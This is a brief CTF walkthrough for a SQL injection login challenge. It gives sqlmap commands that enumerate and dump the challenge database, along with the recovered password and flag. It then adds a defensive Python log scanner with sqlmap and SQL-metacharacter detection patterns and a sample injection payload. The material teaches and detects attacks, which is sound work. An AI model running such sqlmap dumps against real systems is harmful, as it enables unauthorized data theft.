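Challenge link: http://www.shiyanbar.com/ctf/2
- Enter arbitrary credentials; the page returns "登录失败,错误的用户名和密码" ("Login failed, wrong username and password").
- Run sqlmap directly against the login URL to list the databases
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=pass&action=login" --dbs
This finds the database test.
- Enumerate the tables
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=pass&action=login" --table -D test
This finds the table admin.
- Dump the columns
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=pass&action=login" --dump -D test -T admin
This yields the password idnuenna.
- Get the key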
flag:!@#WwwN5f0cu5coM
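
From the defender's side, the requests in this walkthrough are visible in the web server's access log. The following is an added example, not part of the original write-up: it scans combined-format log lines for the default sqlmap User-Agent and for SQL metacharacters in the `admin` and `pass` parameters. The log lines, IP addresses and the `scan` helper are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not taken from the challenge server).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /basic/inject/index.php?admin=alice&pass=hunter2&action=login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /basic/inject/index.php?admin=admin&pass=pass&action=login HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '198.51.100.9 - - [01/Jan/2024:10:00:06 +0000] "GET /basic/inject/index.php?admin=admin%27%20OR%20%271%27%3D%271&pass=x&action=login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# Request line, status, size, referer, user-agent of a combined-format entry.
REQUEST_RE = re.compile(
    r'"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Heuristic only: quotes, comment openers and a few keywords. A legitimate
# password containing a quote would also match, so treat hits as leads.
SQL_META_RE = re.compile(
    r"'|\"|--|/\*|\b(?:union\s+select|sleep\s*\(|benchmark\s*\()", re.I)
WATCHED_PARAMS = ("admin", "pass")  # the login parameters from the URL above


def scan(lines):
    """Return [(line_number, [reasons])] for suspicious login requests."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        reasons = []
        # The User-Agent is client-controlled, so this is the weaker signal.
        if "sqlmap" in match["ua"].lower():
            reasons.append("sqlmap user-agent")
        # parse_qs percent-decodes values, so encoded quotes are seen as quotes.
        query = parse_qs(urlsplit(match["url"]).query, keep_blank_values=True)
        for name in WATCHED_PARAMS:
            if any(SQL_META_RE.search(value) for value in query.get(name, [])):
                reasons.append(f"SQL metacharacters in '{name}'")
        if reasons:
            findings.append((number, reasons))
    return findings


if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```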